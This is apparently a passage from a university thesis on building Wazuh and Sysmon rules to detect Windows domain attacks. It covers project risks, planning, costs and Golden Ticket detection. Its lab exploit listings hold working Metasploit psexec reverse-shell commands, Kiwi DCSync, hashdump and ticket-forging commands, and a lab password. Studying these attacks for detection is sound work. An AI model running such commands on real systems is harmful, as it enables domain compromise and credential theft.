CHAPTER 4. PROJECT MANAGEMENT Identifier R-01 Name Optimistic planning, “best case”, instead of a realistic “expected case” Description An optimistic planning at the start of the project does not take into account problems or delays, and so it does not allocate time for them. Negative effects Could mean the failure of the project if the objectives can not be accomplished in the time left. Cascading delays, because the work done would not fit the planning. Probability Medium Impact High Exposition High Indicator There are 3 consecutive delays, after the beginning of the project. Prevention: Avoid Allocate a bit more time than initially expected for each task, in case something goes wrong. Correction: Mitigate Redo the planning. Reduce the scope of the project, leaving out initially planned optional increments. 4.2. RISK MANAGEMENT 41 Identifier R-02 Name Bad requirement specification Description The requirements specified at the beginning of the project are not enough detailed, are not needed or there are new requirements after the beginning of the project. Negative effects Possible failure of the project if the objectives can not be accomplished in the time left. Wasted time, due to lack of communication in the requirement specification. Probability High Impact High Exposition High Indicator There are 3 changes in the requirements specification. Prevention: Mitigate Confirm that all the requirements have been identified at the beginning of the project. Assure that there is no ambiguity in the requirement specification. Correction: Mitigate Redo the requirement specification. Rework of related requirements and work based on them, including the need to test the results. Redo the planning. Reduce the scope of the project. Identifier R-03 Name Design errors Description A design is not enough or is incorrect. This can be found in later stages, when it is clear that the implementation based on the design would not satisfy the requirements. Negative effects Having to redesign and maybe redo the work based on the design. Minor delays. Probability Low Impact Medium Exposition Low Indicator There are 3 designs that need rework. Prevention: Mitigate Use design patterns if needed (this project should have very simple designs, so it is possible that there is no need to use them). Make the design as simple and modular as possible. Correction: Mitigate Redesign and probably change and test the work based on the design. 42 CHAPTER 4. PROJECT MANAGEMENT Identifier R-04 Name Lack of key information from sources Description Not having key information from articles, documentation or manuals. Negative effects Minor delays. Loss of quality. Added difficulty, even if the work is done in time. Maybe rework and test the functionality, even completely, to follow the desired procedure. Probability Medium Impact Medium Exposition Medium Indicator The duration of the study of the attack and the related tools ends being 50% longer than expected. Correction: Mitigate Ask the security consultants from Tarlogic for specific information. Possibly the need to rework completely some functionality. Identifier R-05 Name Lack of feedback or support from the security consultants from Tarlogic Description Because I do not know enough about some technical aspects of cybersecurity to solve all the problems by myself in time, Tarlogic has offered to help (in a tutoring way) if a problem arises. This help could be critical to solve or get around some of the most complex problems, which probably happen to be critical points, needing to be dealt with to continue working on that stage. Negative effects Cascading delays. Probability Medium Impact Medium Exposition Medium Indicator A simple technical question takes more than 2 working days to be answered or a complex question takes more than 7 working days. Prevention: Mitigate Ask in a clear way and with as many details as possible. Ask during work hours, to ensure they are available. Correction: Mitigate Redo planning and possibly change the scope. 4.2. RISK MANAGEMENT 43 Identifier R-06 Name The learning curve of some technologies is larger than expected Description This is a critical need because not having enough knowledge can result in an inefficient approach to accomplishing the objectives. Negative effects Loss of quality. The work is more complicated. Probability Medium Impact Medium Exposition Medium Indicator The duration of the study of the technologies ends being 50% longer than expected. Correction: Mitigate Redo planning and possibly change the scope. Ask the security consultants from Tarlogic for specific help. Maybe the need to rework completely some functionality. Identifier R-07 Name The uncertain parts of the project take more time than expected Description There is not enough specification on what a tasks implies or not enough planning. This means that a part of the project is not understood as it should, and the work done is not what was expected or is not enough, needing more time to finish. Negative effects Wasted time that should have been easy to avoid. Loss of quality. Could mean the failure of the project if the objectives can not be accomplished in the time left. Probability Low Impact High Exposition Medium Indicator A task takes 25% more time than expected and when the causes are investigated it is revealed that there were ambiguous descriptions or planning. Prevention: Avoid Try to detail every part enough, having no obvious ambiguity. Correction: Mitigate Possible need to redo the specifications. Redo planning and possibly change the scope. Maybe having to redo related work. 44 CHAPTER 4. PROJECT MANAGEMENT Identifier R-08 Name Source material is not available Description All or part of the source material can not be accessed, probably because the only host of the resource is down. Negative effects In some cases this could mean a delay in a critical task, delaying the whole project for an unknown period of time. Probability Low Impact Medium Exposition Low Indicator There have been at least 10 failed attempts to download the source material, at least 5 with a computer A in a network X and at least 5 with a computer B in a network Y. Prevention: Avoid When possible choose the source with the best uptime. Correction: Mitigate Redo planning and possibly change the scope. Possible need to cut out the part of the project that depends on this source. Maybe find another source or wait for the original source to be accessible again. 4.2. RISK MANAGEMENT 45 Identifier R-09 Name Unexpected changes to any of the software used in the project Description Changes to base software could affect this project directly or indirectly: programs could fail or not work as expected. This could mean any software changes, from simple syntax to API changes. It is possible that these changes would eliminate the need of planned or already done work. In a project that does not work in a bleeding edge environment, like this, this occurrence should be very rare and even if it were to happen it would have to interfere with the part of the software this project uses, which (as this is not bleeding edge) normally would be backwards compatible. Negative effects Minor delays. Unnecessary work. Probability Low Impact Low Exposition Low Indicator The software is not working as expected due to a change in another software version. Prevention: Mitigate When possible use software that follow good design guidelines and try to be backwards compatible. Be informed about the roadmap and future functionalities of these software projects. Correction: Mitigate Need to adapt the software to work as expected or remove the related functionalities. 52 CHAPTER 4. PROJECT MANAGEMENT Improvements in IDS: adding functionality to Wazuh Closing of the project Project documentation Pull request to the official ruleset repository Increment 7: VirusTotal integration Improved integration with antivirus and website scanners Increment 6: Additional detection for GNU/Linux Rules and decoders Increment 5: Explore solutions in problems with GPDR Rules and decoders Increment 4: Adapt Wazuh configuration to typical requirements from enterprises Configuration changes Increment 3: Detection/action against ransomware Rules and decoders Increment 2: Use of more data sources Rules and decoders Increment 1: Common attacks in Windows Server Rules and decoders Beginning of the project Setup of the work environment Study of Wazuh documentation and related tools and technologies Project management Cost management Configuration management Time management Risk management Requirement management Scope management WBS dictionary: 1. Project management aScope management: Scope explanation, set the restrictions of the project and determine what is going to be turned in at the end of the project. 4.3. TIME MANAGEMENT 53 bRequirement management: Analysis, requirement specification and probably a traceability matrix. cRisk management: Identification, analysis, classification, planning and supervision of risks. dTime management: Planning (initial and real), any planning changes and necessary measures. eConfiguration management: Documentation on the management of changes and version control. fCost management: Cost estimation (direct and indirect) of software, hardware and resources. 2. Beginning of the project aStudy of Wazuh documentation and related tools and technologies: It is the base for multiple aspects of the project and if it is done correctly it can mean less hours in related work. bSetup of the work environment: Installation and basic configuration of the virtual machines of the project, like having a functional Wazuh environment. 3. Increment 1,Rules and decoders: The objective is to be able to detect common attacks in Windows Server (specifically 2016 and 2019), but it should be backwards compatible and depending on the difficulty it could be worth to ensure support for Windows 10 Pro too. This rules are the final product of this increment, which probably will need more time than any other increment, because of its heavy study and testing. 4. Increment 2,Rules and decoders: It will need a preliminary study of Sysmon and the ways to use its data to improve detection in certain situations. It is possible that this increment will modify rules and decoders of the previous one. 5. Increment 3,Rules and decoders: This increment tries to produce rules and decoders to detect ransomware and launch alerts and maybe actions against the attack, like rollback to a previous backup or try to stop the attack from repeating in a short period of time. 6. Increment 4,Configuration changes: Adapt Wazuh to the typical requirements from enterprises. This means that an enterprise could choose from a set of templates, with different security profiles. 7. Increment 5,Rules and decoders: It should be focused mostly on detecting changes on the protected files. Part of this increment should 54 CHAPTER 4. PROJECT MANAGEMENT be the investigation on usual problems of these technologies and recent innovations and solutions. 8. Increment 6,Rules and decoders: There would be preliminary study to do, but the increment should be about expanding the already done work in the field, probably focusing in services and security technologies like SELinux or AppArmor. 9. Increment 7,Improved integration with antivirus and website scanners: The idea is to improve the detection as much as possible with the help of VirusTotal malware scanners, which is updated consistently and so it would mean a consistently updated detection for a system with Wazuh without the need to write new rules and decoders. Obviously there is a difference in the scope and objectives of these technologies, which can be redundant, but this could be certainly interesting in some cases. 10. Closing of the project aPull request to the official ruleset repository: There is a fundamental need to investigate the correct way to organize the forked repository for a pull request to an official repository like this. In any case the status of the fork should be checked before and there should be a high amount of commits and use a different branch for each functionality, allowing an easier way to select what to admit or not in the official repository. bProject documentation: The memory and presentation of the project and whatever other documentation if necessary. 4.3.2 Initial planning The date of the beginning of the project is the 1 of November. The tasks marked in red are essential to the project, meanwhile the ones marked in cyan are considered optional and only will be done if there is enough time left. The tasks marked in yellow are used when there is no need to distinguish between essential and optional. The next Gantt diagram shows the initial planning, from the draft proposal (31/10/2018) to the end of the project (20/02/2019). Furthermore the last two weeks are marked with a grey overlay to mark that there are only about 17 weeks before the original due date of this project (in February). This difference is because the estimation of the tasks was made by the student and so it is not reliable, which means that it could be optimistic or 4.3. TIME MANAGEMENT 55 pessimist. Thus the need to either reduce tasks or have more than there were expected to fit. Planning of the project in weeks 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Project management Beginning of the project Increment 1 Increment 2 Increment 3 Increment 4 Increment 5 Increment 6 Increment 7 Closing of the project Figure 4.1: Planning simplification The rest of the Gantt diagrams are organized in days, for a more detailed planning. It is important to note that these plannings could change during the project, either because controlled measures or any unexpected reason. The order they are implemented could change too and that is the reason because these diagrams have not a set date for start and end. In other words, they could be described as the models for the final Gantt diagrams. 56 CHAPTER 4. PROJECT MANAGEMENT Planning in days 1234567 Preliminary study and investigation Wazuh documentation Pentesting tools Basic knowledge of the technologies Work environment preparations Installing virtual machines Setting up Wazuh Setting up other tools Ready to start the first increment Figure 4.2: Planning of the beginning of the project 4.3. TIME MANAGEMENT 57 Planning in days 1 2 3 4 5 6 7 8 9 10111213141516171819202122232425262728 Preliminary study and investigation Identify the attacks to detect Detailed study of each attack Detailed study related tools Exploration of detection options Discard undetectable attacks Basic design of each attack Code the detection Writing rules and decoders Automation of actions Support for Windows 10 Testing and fixing Testing Fixing Certain attacks can be detected now Figure 4.3: Planning of the increment 1: Common attacks in Windows Server 58 CHAPTER 4. PROJECT MANAGEMENT Planning in days 1234567 Preliminary study and investigation Detection advantages with Sysmon Identify the cases to change Identify the attacks that can be detected now Code the detection Changing rules and decoders Adding rules and decoders Testing and fixing Testing Fixing Improved detection using data from Sysmon Figure 4.4: Planning of the increment 2: Use of more data sources 4.3. TIME MANAGEMENT 59 Planning in days 1 2 3 4 5 6 7 8 9 101112131415161718192021 Preliminary study and investigation Identify the attacks to detect Detailed study of each attack Detailed study related tools Exploration of detection options Discard undetectable attacks Basic design of each attack Code the detection Writing rules and decoders Automation of actions Testing and fixing Testing Fixing Protection against certain ransomware attacks Figure 4.5: Planning of the increment 3: Detection/action against ransomware 60 CHAPTER 4. PROJECT MANAGEMENT Planning in days 1234567 Preliminary study and investigation Find out common needs for enterprises Identify reasonable configurations Code the detection Setting up each configuration Testing and fixing Testing Fixing Set of Wazuh configurations Figure 4.6: Planning of the increment 4: Adapt Wazuh configuration to typical requirements from enterprises 4.3. TIME MANAGEMENT 61 Planning in days 1 2 3 4 5 6 7 8 9 101112131415161718192021 Preliminary study and investigation Identify the situations to detect Detailed study of each case Detailed study related tools Exploration of detection options Discard undetectable cases Basic design of each case Code the detection Writing rules and decoders Automation of actions Testing and fixing Testing Fixing Protection for certain GPDR problems Figure 4.7: Planning of the increment 5: Explore solutions in problems with GPDR 68 CHAPTER 4. PROJECT MANAGEMENT February 25 26 27 28 Check changes from last working setup Wazuh documentation and tools used in the project Known and new attacks Basic knowledge of the changes Installing virtual machines and setting up tools Ready to continue with the increments Figure 4.12: Planning of updating the tools of the project Increments 1 and 2 were worked on for most of the project, mainly due to inexperience and unplanned events more than the actual difficulty of their content. The next Gantt shows the work done on them after the project was on hold for 3 months, because before it only research was done. After 3 months most of the research was redone to ensure nothing was forgotten. The tasks initially planned for increment 2 were so small and integrated into already existing tasks for increment 1 that it made no sense to add them to this Gantt. 4.3. TIME MANAGEMENT 69 June July Preliminary research and codification Study of ransomware Codification of the basic file encryption example Exploration and codification of detection options Testing and fixing Testing and fixing the detection mechanisms Testing with real ransomware Detection/action against certain ransomware patterns Figure 4.14: Planning of the increment 3: Detection/action against ransomware 70 CHAPTER 4. PROJECT MANAGEMENT March April May June Preliminary study and investigation Identify the attacks to detect Detailed study of each attack and tools Exploration of detection options Discard undetectable attacks Basic design of each attack Code the detection Writing rules and decoders Two weeks pause Writing rules and decoders Testing and fixing Testing Fixing Certain attacks can be detected now Figure 4.13: Planning of the increments 1 and 2 4.4. CONFIGURATION MANAGEMENT 71 July 19 20 21 22 23 Finishing the documentation of the project Cost management and detail fixing Review of the memory by the tutors The documentation of the project is finished Figure 4.15: Planning of the closing of the project 4.4 Configuration management The objective of the management of the configuration is to control the changes on the configuration elements, for the duration of the project. This assures the work is always archived, resulting in multiple control advantages. A Git repository[24] hosted on Github was used to manage the documentation of the project, which revolves mostly around this document. Another private Git repository was used to keep track of notes, uncertain elements and development in process. Git commits are used to keep track of the changes made in the documentation. Issues, milestones, releases and other features were not used, but they could be if any need appeared. There is only the master branch, because this project is not about software development and there is only one contributor. 4.4.1 Configuration elements They are the items that need to be monitored in order to guarantee the consistency of the project. They can be grouped into: •Code: The scripts and ruleset elements created in the project. •Diagrams and images: They help to explain some of the key concepts of the project. 72 CHAPTER 4. PROJECT MANAGEMENT •Memory of the project: This very document. It is mandatory because it explains the whole project. This item actually makes use of the other two, to fully document the project. This does not include the virtual machines nor its snapshots because by themselves they are not configuration material, but a result of applying certain configuration over generic images of operative systems. This configuration is already documented by other sources, cited in this document. Still local backups were made because they are still important archives to the project. 4.5 Cost management In this section an estimation of the costs of the project is made based on the relevant data available at the end of the project. The project is set in Spain, therefore the currency used is the Euro (e). This is used up to a precision of cents. Even though Tarlogic is considered the client there is no payment to the student because this is the final project of a degree. The costs were divided into direct costs and indirect costs. 4.5.1 Direct costs All the software used in the project was free, including the Windows images (they were free trials). Other materials are the CD to burn the software of the project and the version of this document in paper. Their combined cost is estimated in 20e. The rest of the direct costs are the human and hardware resources. Human resources The human resources are the student, the director from the University, the director from Tarlogic and two members of Tarlogic that helped the student with issues at several points in the project. The next salary parameters are assumed: •There are 14 payments per year. •Social Security costs 32% of the brute salary. 4.5. COST MANAGEMENT 73 •The job journey is 8 hours of work per day and there are 20 working days per month. The estimation of the hours that the student worked on the project comes from: •The worked time while the project was on hold is zero. •In the first weeks of the project the the estimation of hours worked per week is 21. The project started the day 1 of November and was put on hold 35 days later. •After returning to work on the project on the 25 of February the estimation of hours worked per week is 11, and lasted for 68 days until the project was on hold for two weeks. •In the last stage of the project the estimation of hours worked per week is 21 again. This lasted 65 days, from the 20 of May until the end of the project. Therefore the estimation is: (35 + 65) ·21/7 + 68 ·11/7 + 11.25 = 418.10 hours. The estimation of the hours that the directors and the involved members of Tarlogic is 11.25hours. This value is the usual estimation of hours for tutoring and evaluation. The annual brute income for the job titles are taken from the website Indeed[41], which calculates the average of hundreds of job offers in the last months. In the case of the student the salary was an optimistic value. The job title assumed for the student is Junior Developer. The job title assumed for the directors is Project Manager. The Project Manager has 22.5hours because this project has 2 directors. Role Brute annual Social Security Total annual Cost/Hour Project Manager 45448e14543.36e59991.36e26.78e Senior Engineer in Cybersecurity 29754e9521.28e39275.28e17.53e System Administrator 24234e7754.88e31988.88e14.28e Junior Developer 16000e5120e21120e9.42e Table 4.5: Annual costs of the human resources 74 CHAPTER 4. PROJECT MANAGEMENT Role Hours Cost/Hour Total cost Project Manager 22.5 26.78e602.55e Senior engineer in cybersecurity 11.25 17.53e197.21e System administrator 11.25 14.28e160.65e Junior Developer 418 9.42e3937.56e Table 4.6: Costs of the human resources for the hours dedicated to the project The total of the last table is 4897.97e. Hardware resources The cost of the hardware is calculated with the amortization and the total price of the item, with the next formula: Price of the item 12 ·Duration of the item in years ·Duration of the project in months Figure 4.16: Formula to calculate the cost of hardware items In this case it is assumed that the duration of project is 5.5 months, due to the time the project was on hold. The duration of the hardware items is estimated in 3-5 years, so the average is used in this case for all the items. The hardware items are: •A computer leaning to the higher end in order to run the set of virtual machines: with 20 GB of RAM, an i5-2500k processor and about 500GB of free disk storage (of which 100GB were of Solid State Disk). The estimation of the computer is hard to make because it is several years old and made of parts buyed years apart from each other. The value estimated is 1250e, therefore resulting in a cost of 143.23e. •A monitor of 24 inches valued in 147.75elast year. Using the previous formula the cost is 16.93e. •Other peripheral devices: their collective value is estimated in 20e, therefore resulting in a cost of 2.23e. The total of the hardware cost is 162.39e. 4.5. COST MANAGEMENT 75 4.5.2 Indirect costs The indirect costs of the project mean hidden costs in the resources used. For example the cost of the Internet connection, electrical devices, etc. According to the General Secretary of the University of Santiago de Compostela the indirect costs in this kind of final degree project should be calculated as an extra 20% of the direct costs[42]. Because the estimation of the direct costs is 5060.36e, the indirect costs adds 1012.07eover it. 4.5.3 Total costs of the project The total costs is calculated simply by the addition of direct and indirect costs, resulting in 6072.43e. 76 CHAPTER 4. PROJECT MANAGEMENT Chapter 5 Increments 1 and 2 The title of these increments are Common attacks in Windows Server and Use of more data sources. Due to reasons stated later in 5.1.3 these increments that were planned to be implemented individually were actually done together. This chapter satisfies the next non-functional requirements: RNF-01, RNF-02, RNF03, RNF-04, RNF-05 and RNF-08. In order to understand and detect the malware we try to put ourselves in the attacker place, in some cases using scripts and tools that can be considered harmful and illegal. This is only a way to accomplish the real objective that is the detection. This behaviour is kept to a minimum, it is only done in the machines of this laboratory and no kind of harm is intended outside of this project. In this laboratory we disabled the antivirus and Windows Defender to avoid unnecessary delays. Particularly the DisableAntiSpyware and DisableRealTimeMonitoring were enabled in the registry. Our intention is to detect as much as possible without depending on other programs, and in this increment Windows Defender was not needed. As this chapter progresses new detection methods are introduced that could be of use in some of the previous cases. Usually this is not mentioned, in order to keep the explanations simple. 5.1 Golden Ticket Windows domains are a very common way to manage network accounts in companies. The servers of this kind of domain are Domain Controllers and the program that handles the domain directory is the Active Directory. The Domain Controller (DC) runs the Key Distribution Center (KDC), which handles Kerberos ticket requests, which are used to authenticate users and allow access to services 77 84 CHAPTER 5. INCREMENTS 1 AND 2 This follows the same structure as the previous cases, but this time with the dcsync option. The disadvantage in this case is that there needs to be a connection to a running DC that is not being monitored for the requests Mimikatz sends. There are open source tools available for this kind of monitoring[55] and it can also be detected by monitoring the network[56]. Exploit 1.4: DCSync with Kiwi In this case the access to the no-DC computer in the targeted network is done through Metasploit[25] and its own version of Mimikatz called Kiwi[52]. The Kali virtual machine is for running Metasploit outside the AD, but a Windows machine running in the AD could have been used as well. We need to know the password of the account we want to access remotely and the targeted computer needs to have a SMB share. In this case the variable SMBPass stores the password, which is Passw0rd. use exploit/windows/smb/psexec set RHOSTS 10.0.3.3 set payload windows/meterpreter/reverse_tcp set SHARE C$ set SMBUser Administrator set SMBPass Passw0rd set LHOST 10.0.3.50 run Listing 5.5: Part 1 of the remote DCSync exploit automation This runs a remote process, exploiting the SMB capabilities to run commands to spawn a Meterpreter shell[57] with administrator privileges. Now we are in a Meterpreter shell, which we can use to get the exact privileges we need for the next part. This is because even though we have administrator privileges there are different kinds of administrator privileges on Microsoft systems. 5.1. GOLDEN TICKET 85 Figure 5.2: Meterpreter shell running To do this we look for a session running administrator privileges in the AD. In this case the targeted machine had a PowerShell session running as administrator, to which we migrate. Figure 5.3: Migration to a PowerShell session as AD administrator Now we are ready to run the real exploit. This loads the Metasploit version of Mimikatz (Kiwi) in the Meterpreter shell, allowing the attacker to use Kiwi commands. The command in this case retrieves the information of the KRBTGT account needed to generate the Golden Ticket. In this case the generation of the ticket is not using the data in an automated way, because there was no real need since is the same every time and the time needed to do this with Ruby felt like a waste. In this case the ticket is saved to the /tmp/golden.tck file in the Kali machine. load kiwi dcsync_ntlm krbtgt golden_ticket_create -d wazuh.local -u Administrator -s S ,→-1-5-21-3307301586-4221688441-1196996515-502 -k ,→ec9183c701e861eda574d85939d635cd -t /tmp/golden.tck Listing 5.6: Part 2 of the remote DCSync exploit automation 86 CHAPTER 5. INCREMENTS 1 AND 2 Figure 5.4: Retrieval of KRBTGT data and generation of the Golden Ticket with Kiwi The obvious downside of this method for the attacker is that Metasploit is very widely used and known, therefore there could be security monitoring for it[58]. But again the attacker is using a technique that does not need to control a DC and does not need to store anything in the disk of the targeted system, making it much harder to detect in that regard. Of course there is no real need to use Metasploit to get a remote shell to run Mimikatz. The attacker could use SSH, run remote commands with psexec or use the Windows Remote Shell. But some of these need to be enabled and they would not be much different from the previous examples. Exploit 1.5: Hashdump with Meterpreter Using a reverse TCP exploit the attacker access the targeted DC with a Meterpreter shell. This is similar to the previous case but using the Meterpreter command hashdump instead of the DCSync retrieval of Kiwi[52]. This stills uses Kiwi to generate the Golden Ticket. use exploit/windows/smb/psexec set RHOSTS 10.0.3.2 set payload windows/meterpreter/reverse_tcp set SHARE C$ set SMBUser Administrator 5.1. GOLDEN TICKET 87 set SMBPass Passw0rd set LHOST 10.0.3.50 run Listing 5.7: Part 1 of the remote Hashdump exploit automation Again there is a migration to an administrator account of the AD. In this case another command to get the SID of the network would be needed if we did not know it already, for example a simple whoami /user would suffice. hashdump load kiwi golden_ticket_create -d wazuh.local -u Administrator -s S ,→-1-5-21-3307301586-4221688441-1196996515-502 -k ,→ec9183c701e861eda574d85939d635cd -t /tmp/golden.tck Listing 5.8: Part 2 of the remote Hashdump exploit automation Figure 5.5: Retrieval of KRBTGT data with hashdump As before it is expected of the DCs to be more monitored. This means that the DCSync version is more interesting to an attacker because it has the same difficulty and benefits at a lower risk. 5.1.2 Detection purely with signatures Searching for suspicious strings can be used to trigger alerts with Wazuh. Signature matching of data coming from Windows events and default logs from Windows systems is not much different from what any antivirus does. It follows that it would be as easy to evade as them. For example with substitution of suspicious strings from the source code and recompilation[59]. This does not mean that signature matching is totally worthless, but that it is not something to focus on. In this project relying in signatures was avoided as much as possible. Useful signatures to match not only amount to third-party tools. It is easy to monitor extensions, directories, certain files, command line options, usernames, etc. 88 CHAPTER 5. INCREMENTS 1 AND 2 Because no detection techniques are perfect techniques to avoid them can appear over time, resulting in changes or new ways to detect also the new evasion mechanisms. This means that even if we manage to detect programs like Mimikatz now it could be overcome in the future. That does not mean that detection techniques are bound to fail or that there is no point to them. Many attackers know how hard it can be to overcome detection techniques. It is also important to remember these scenarios are continuously changing, with new techniques to avoid detection and the creation of new tools. 5.1.3 Detection purely with Windows events In theory we can identify certain attacks only with the security events of Windows. There are multiple websites in which the Golden Ticket attack has been analyzed and its events identified[46][60]. Unfortunately the events recorded in this project did not always probe to be the same as the cited sources, probably because it was tested on the new Windows Server version (2019). In most cases their frequency is not enough to be distinguished from the regular activity, even when using a lab environment without work load. This could probably be improved if these events had more information (particularly those as critical as Kerberos’), but they are very short and generic. Wazuh provides access to Windows events by default, due to the rules and decoders of its ruleset[18]. We can enable additional logging with the Advanced Audit Policy Configuration. For example for auditing kernel objects, more Kerberos logging, changes in settings or account events. The user just needs to define rules to specify what he wants to monitor and how he wants it. The student tried to analyze the security events to find patterns in the previous exploits, by recording all the data received by Wazuh during their execution. This was done just by looking the current line of the log, executing the exploit and copying the log from there to a new file. The obvious problem of this method is that it results in logs with tens to hundreds of lines filled with a not very easy to read format. The workaround used was to parse the logs with custom AWK scripts[24], removing fields to make the logs more readable and counting each of the events in them. The idea of finding a relationship between certain windows events and this attack was abandoned because: •It was not providing any new results. 5.1. GOLDEN TICKET 89 •It was too time consuming. •It can be accomplished using Sysmon[23][61]. •Also it was concerning the amount of noise this method has, even though in a laboratory without real system load, to tell apart an intrusion from a totally healthy system. The real useful addition to the Windows built-in events is having Sysmon[23] in each of the monitored Windows computers. They can be combined to identify attackers better[60]. With Sysmon we can have reports of events with IDs [1-21] and 255, which in some cases provide very precise and useful information of the system. For example we can configure Sysmon to log data about processes, like: PowerShell, Mimikatz, any .ps1 or any .exe. Sysmon can monitor each of the events either by whitelisting or blacklisting by default or both. We can also combine it with rules from Wazuh, using Sysmon to increase the report capabilities and Wazuh to filter them. Originally getting more data from Sysmon and other sources for detection was an increment in itself, but seeing as the first increment could not be accomplished without it both were combined into the same increment. This was due to overestimating the report capability of Windows events in the planning stage and because increment 2 was way easier than planned. From this point Sysmon and remote scripts are used to identify threats and they do not have to be just additional detection as it was first planned. It is also important to note that Sysmon can be a bit tricky to balance the configuration to get as much suspicious events as possible, while not reporting so much it affects the performance of the network. This is responsibility of the administrators of the network, who also have to tune the configuration to their custom needs. There are public configs for Sysmon that attempt to provide a good insight of the system while not logging too much data[62] and some even with OSSEC on mind[63]. Having a working setup of Wazuh and Sysmon just requires to install Sysmon in the Windows computers and enable forwarding its log C.54. 5.1.4 Detection of Mimikatz Mimikatz is the tool of choice for this kind of attack for most attackers because it is very effective, easy to use and has multiple ways to be used in different attacks[26][54]. This is a double edge sword for Mimikatz because it has become 90 CHAPTER 5. INCREMENTS 1 AND 2 one of the programs to look for in antimalware detection programs. In this case we assume these programs have not detected Mimikatz and is up to Wazuh to do it. It is interesting to note that the author of Mimikatz provides ways to detect it, like the YARA rules he maintains[26] or BusyLights[59]. Detecting Mimikatz is not a sign of a Golden Ticket attack (unless it is clear in the way it is used), but it still is a big and dangerous threat to the system and worth checking out. Unfortunately as seen in the exploits before there are multiple ways to execute Mimikatz, in an attempt not to be discovered by known techniques. Each time a Mimikatz shell spawns certain DLLs are loaded. The technique to identify a succession of events in a short time as another event is called grouping or composite. Grouping is a very effective technique, but it can require a lot of work to identify its components. In some cases the attack may not produce enough noise or it may not be possible to tell it apart from the normal events of the system[23][61]. Fortunately Mimikatz needs a fair amount of DLLs to work and some of them are not very usual. This makes the execution of Mimikatz noticeable. The load of a DLL can be detected by the event 7 of Sysmon and the grouping can be identified with Wazuh rules. It also can be detected by the event 10 of Sysmon, for inter-process access, but at greater cost of bandwidth. For this task is better to configure Sysmon to monitor these 5 images, to avoid logging too much: <ImageLoad onmatch="include"> <ImageLoaded condition="is">C:\Windows\System32\WinSCard.dll</ ,→ImageLoaded> <ImageLoaded condition="is">C:\Windows\System32\cryptdll.dll</ ,→ImageLoaded> <ImageLoaded condition="is">C:\Windows\System32\hid.dll</ ,→ImageLoaded> <ImageLoaded condition="is">C:\Windows\System32\samlib.dll</ ,→ImageLoaded> <ImageLoaded condition="is">C:\Windows\System32\vaultcli.dll</ ,→ImageLoaded> </ImageLoad> Listing 5.9: Sysmon monitoring with event 7 for certain DLLs On the manager side the next rules are needed: <rule id="300300" level="0" > <if_group>sysmon_event7</if_group> 5.1. GOLDEN TICKET 91 <field name="win.eventdata.imageLoaded">\\Windows\\System32 ,→\\\.*.dll</field> <description>Detected event 7 with \Windows\System32</ ,→description> </rule> <rule id="300301" level="1" > <if_sid>300300</if_sid> <field name="win.eventdata.imageLoaded">WinSCard.dll|cryptdll. ,→dll</field> <description>Detected event 7</description> </rule> <rule id="300302" level="1" > <if_sid>300300</if_sid> <field name="win.eventdata.imageLoaded">samlib.dll|hid.dll| ,→vaultcli.dll</field> <description>Detected event 7</description> </rule> <rule id="300303" level="3" timeframe="10" frequency="2" > <same_field>win.system.computer</same_field> <if_matched_sid>300301</if_matched_sid> <if_matched_sid>300302</if_matched_sid> <description>Maybe Mimikatz: DLLs with EventID 7</description> </rule> Listing 5.10: Rules for suspecting a Mimikatz execution as a group of events The sysmon event7 means that another rule has marked the log as a Sysmon event of type 7. The same field option means that every one of the matches must have the same value in the designed field, which in this case means that these events come from the same computer. The frequency option means that the rule has to be matched that number of times to trigger. It is set to 2 because is the minimum value possible. Usually each of the suspicious DLLs would have its own rule, but it would not always identify Mimikatz because the frequency has to be at least 2. Therefore rules 300301 and 300302 identify 2 and 3 DLLs each (using a logical OR), making it possible to trigger the grouping rule. The last rule identifies the use of the DLLs in a 10 seconds gap as the execution of Mimikatz. This detection could be evaded by adding time between the load of the DLLs in the source code. The problem of these less precise rules is that it is possible to have false positives. None were seen during this project for this case. Unfortunately due to the way OSSEC matches rules there is no way to have an hierarchy of rules to trigger a precise grouping rule or the other one. It is possible to have a rule for each DLL using active response to generate two alerts instead of one C.1, but is much slower and less efficient. 92 CHAPTER 5. INCREMENTS 1 AND 2 Detecting the use of every variant of Mimikatz is virtually impossible, not only because their sheer number due to its popularity but because anyone can compile their own. Therefore the logical way to detect Mimikatz would be to detect the basic step for every version: the interaction with the LSASS and process injection. This is studied later on page 108. Exploit Detected 1.1: Local Mimikatz in DC Yes 1.2: Mimikatz from memory in DC Yes 1.3: Mimikatz with DCSync Yes 1.4: DCSync with Kiwi Yes 1.5: Hashdump with Meterpreter Yes Table 5.1: Exploit detection by grouping events This method detects the use of Mimikatz in all the ways implemented in this project. The hashdump exploit is detected because Kiwi is used in the session in that machine to generate the Golden Ticket. A real attacker probably would generate the ticket outside of the network, avoiding being detected by this technique. 5.1.5 Detection of the use of the TGT with klist We can not always detect when a forged TGT is generated, but the attacker still needs to use it to gain access to the active directory domain with the privileges set in the ticket. The first choice for this task would be to monitor the Kerberos log searching for unusual patterns, but it proved to be more hard than it should, so instead of a scan of the cache of the Kerberos tickets every few minutes was implemented. The program to examine the contents of the cache is klist. In order to do this we need to enable the execution of Wazuh’s remote commands in the Windows agent and set the properties of the command in the manager C.4[64]. In this case the command is a script C.5 to get all the tickets of all the sessions with klist, compare the ticket value for the field TicketExpireHours with the value of MaxTicketAge of the Group Policy (putting the difference in a new field) and parse the output to JSON. Having the output in JSON makes it a bit easier to read from the logs (which is useful to fix any mistake in the script) and removes the need of a decoder in the manager. The idea came from a very different klist script that only works interactively and reports in plain text[65]. 5.1. GOLDEN TICKET 93 This script needs to be run in every member of the network to guarantee detection for every user. The conversion to JSON was done manually to add information and because the ConvertTo-Json cmdlet does not work as expected. Doing this with only PowerShell assures it will work in any Windows system without external programs. The downside of this parsing and my limited knowledge of PowerShell is that the script is a bit bulky and the dependency on the format of the output of klist. Unfortunately the automated way to get the MaxTicketAge from the Group Policy in C.6 does not work by default with remote commands because Windows remote commands only allow certain types of commands. In any case the MaxTicketAge value is not usually changed and it requires AD administrator privileges to do it, so due to the time constrains of the project this automation was abandoned. There are other ways to get the MaxTicketAge value, but as mentioned it is not something to spend time on. Next there is an example of the difference between the normal output of klist and the string stored in an alert in the manager. Figure 5.6: Klist listing tickets for a certain session 100 CHAPTER 5. INCREMENTS 1 AND 2 5.2.1 Exploit methods Because the database file of the AD accounts is locked from copying and reading, only Windows tools are allowed to. These tools are [50]: •Reg: Allows to change or save registry hives, including those that contain credentials. •Ntdsutil: Provides management of this database, including creation of backups. •WMIC: Commands for the Windows Management Instrumentation. They allow all kinds of remote management, including copy of files using Shadow Copy. Sysmon has 3 events to 